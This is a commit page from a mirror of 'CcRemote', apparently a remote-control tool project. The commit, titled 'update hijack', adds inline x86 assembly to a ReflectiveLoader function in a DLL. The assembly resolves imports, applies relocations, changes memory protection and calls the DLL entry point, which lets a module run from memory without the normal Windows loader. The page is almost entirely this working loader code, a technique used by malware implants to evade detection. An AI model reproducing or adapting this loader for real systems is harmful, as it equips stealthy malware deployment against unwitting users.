GuanM/CcRemote
1
0
Fork 0
mirror of https://github.com/Cc28256/CcRemote.git synced 2025-06-16 09:19:49 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

update hijack

Browse Source
This commit is contained in:
Cc28257 2020-09-24 18:40:20 +08:00
parent 8fd11989d5
commit bec02ae086
1 changed files with 270 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

271
CcMainDll/CcMainDll/dllmain.cpp
View File

@ -781,8 +781,277 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
add edx, [ecx+0x0C] // 名称读取 dllName
push edx
call [ebp+LoadLibraryA] // 获取模块句柄
mov [ebp+address], eax
mov [ebp+module_handle], eax // module_handle = 模块句柄
mov eax, [ebp+name_hash] // name_hash = 申请地址的导入表
mov ecx, [ebp+var_8] // var_8 = mem_address
add ecx, [eax] // 找到新内存的导入表位置
mov [ebp+var_14], ecx // var_14 = new_mem_import
mov edx, [ebp+name_hash]
mov eax, [ebp+var_8]
add eax, [edx+0x10] // IMAGE_IMPORT_DESCRIPTOR -> FirstThunk
mov [ebp+var_C], eax // var_C = MAGE_IMPORT_DESCRIPTOR -> FirstThunk
loc_463665:
mov ecx, [ebp+var_C]
cmp dword ptr [ecx], 0
jz loc_46371B
cmp [ebp+var_14], 0
jz short loc_4636E0
mov edx, [ebp+var_14]
mov eax, [edx]
and eax, 0x80000000
jz short loc_4636E0
mov ecx, [ebp+module_handle]
mov edx, [ebp+module_handle]
add edx, [ecx+0x3C]
mov [ebp+var_20], edx
mov eax, 8
imul ecx, eax, 0
mov edx, [ebp+var_20]
lea eax, [edx+ecx+0x78]
mov [ebp+exp_AddressOfNames], eax
mov ecx, [ebp+exp_AddressOfNames]
mov edx, [ebp+module_handle]
add edx, [ecx]
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
mov ecx, [ebp+module_handle]
add ecx, [eax+0x1C]
mov [ebp+var_28], ecx
mov edx, [ebp+var_14]
mov eax, [edx]
and eax, 0FFFFh
mov ecx, [ebp+var_20]
sub eax, [ecx+0x10]
mov edx, [ebp+var_28]
lea eax, [edx+eax*4]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
mov edx, [ebp+module_handle]
add edx, [ecx]
mov eax, [ebp+var_C]
mov [eax], edx
jmp short loc_4636FE
loc_4636E0:
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
add edx, [ecx]
mov [ebp+BaseDllName], edx
mov eax, [ebp+BaseDllName]
add eax, 2
push eax
mov ecx, [ebp+module_handle]
push ecx
call [ebp+GetProcAddress] ;
mov edx, [ebp+var_C]
mov [edx], eax ; IAT
loc_4636FE:
mov eax, [ebp+var_C]
add eax, 4
mov [ebp+var_C], eax
cmp [ebp+var_14], 0
jz short loc_463716
mov ecx, [ebp+var_14]
add ecx, 4
mov [ebp+var_14], ecx
loc_463716:
jmp loc_463665
loc_46371B:
mov edx, [ebp+name_hash]
add edx, 0x14
mov [ebp+name_hash], edx
jmp loc_463631
loc_463729:
mov eax, [ebp+var_24]
mov ecx, [ebp+var_8]
sub ecx, [eax+0x34]
mov [ebp+address], ecx
mov edx, 8
imul eax, edx, 5
mov ecx, [ebp+var_24]
lea edx, [ecx+eax+0x78]
mov [ebp+BaseDllName], edx
mov eax, [ebp+BaseDllName]
cmp dword ptr [eax+4], 0
jz loc_4638F2
mov ecx, [ebp+BaseDllName]
mov edx, [ebp+var_8]
add edx, [ecx]
mov [ebp+name_hash], edx
loc_46375F:
mov eax, [ebp+name_hash]
cmp dword ptr [eax+4], 0
jz loc_4638F2
mov ecx, [ebp+name_hash]
mov edx, [ebp+var_8]
add edx, [ecx]
mov [ebp+var_C], edx
mov eax, [ebp+name_hash]
mov ecx, [eax+4]
sub ecx, 8
shr ecx, 1
mov [ebp+BaseDllName], ecx
mov edx, [ebp+name_hash]
add edx, 8
mov [ebp+var_14], edx
loc_46378E:
mov eax, [ebp+BaseDllName]
mov [ebp+var_60], eax
mov ecx, [ebp+BaseDllName]
sub ecx, 1
mov [ebp+BaseDllName], ecx
cmp [ebp+var_60], 0
jz loc_4638E1
mov edx, [ebp+var_14]
mov ax, [edx] ;
shr ax, 0x0C
and ax, 0x0F
movzx ecx, ax
cmp ecx, 0x0A
jnz short loc_4637ED
mov edx, 0x0FFF
mov eax, [ebp+var_14]
and dx, [eax]
movzx ecx, dx
mov edx, [ebp+var_C]
mov eax, [edx+ecx]
add eax, [ebp+address]
mov ecx, 0x0FFF
mov edx, [ebp+var_14]
and cx, [edx]
movzx ecx, cx
mov edx, [ebp+var_C]
mov [edx+ecx], eax
jmp loc_4638D3
loc_4637ED:
mov eax, [ebp+var_14]
mov cx, [eax]
shr cx, 0x0C
and cx, 0x0F
movzx edx, cx
cmp edx, 3 //; 当此标记为00113时低12为才有效 TypeOffset
jnz short loc_463833
mov eax, 0x0FFF
mov ecx, [ebp+var_14]
and ax, [ecx]
movzx edx, ax
mov eax, [ebp+var_C] // ; self_baseaddress 加载基址
mov ecx, [eax+edx] //; 默认加载基址 + 重定位列表项
add ecx, [ebp+address] // ; 计算当前基址 重定位后的地址
mov edx, 0x0FFF
mov eax, [ebp+var_14]
and dx, [eax]
movzx edx, dx
mov eax, [ebp+var_C]
mov [eax+edx], ecx // ; 修复重定位
jmp loc_4638D3
loc_463833:
mov ecx, [ebp+var_14]
mov dx, [ecx]
shr dx, 0x0C
and dx, 0x0F
movzx eax, dx
cmp eax, 1
jnz short loc_463886
mov ecx, 0x0FFF
mov edx, [ebp+var_14]
and cx, [edx]
movzx eax, cx
mov ecx, [ebp+address]
shr ecx, 0x10
and ecx, 0x0FFFF
movzx edx, cx
mov ecx, [ebp+var_C]
movzx eax, word ptr [ecx+eax]
add eax, edx
mov ecx, 0x0FFF
mov edx, [ebp+var_14]
and cx, [edx]
movzx ecx, cx
mov edx, [ebp+var_C]
mov [edx+ecx], ax
jmp short loc_4638D3
loc_463886:
mov eax, [ebp+var_14]
mov cx, [eax]
shr cx, 0x0C
and cx, 0x0F
movzx edx, cx
cmp edx, 2
jnz short loc_4638D3
mov eax, 0x0FFF
mov ecx, [ebp+var_14]
and ax, [ecx]
movzx edx, ax
mov eax, [ebp+address]
and eax, 0x0FFFF
movzx ecx, ax
mov eax, [ebp+var_C]
movzx edx, word ptr [eax+edx]
add edx, ecx
mov eax, 0x0FFF
mov ecx, [ebp+var_14]
and ax, [ecx]
movzx eax, ax
mov ecx, [ebp+var_C]
mov [ecx+eax], dx
loc_4638D3:
mov edx, [ebp+var_14]
add edx, 2
mov [ebp+var_14], edx
jmp loc_46378E
loc_4638E1:
mov eax, [ebp+name_hash]
mov ecx, [ebp+name_hash]
add ecx, [eax+4]
mov [ebp+name_hash], ecx
jmp loc_46375F
loc_4638F2:
mov edx, [ebp+var_24]
mov eax, [ebp+var_8]
add eax, [edx+0x28]
mov [ebp+var_C], eax
push 0
push 0
push 0xFFFFFFFF
call [ebp+NtFlushInstructionCache]
lea ecx, [ebp+var_64]
push ecx
push 0x20
mov edx, [ebp+var_4C]
push edx
mov eax, [ebp+var_50]
push eax
call [ebp+VirtualProtect]
push 0
push 1
mov ecx, [ebp+var_8]
push ecx
call [ebp+var_C] // ; call dllmain
push 0
push 4
mov edx, [ebp+var_8]
push edx
call [ebp+var_C]
mov eax, [ebp+var_C]
mov esp, ebp
pop ebp
retn
}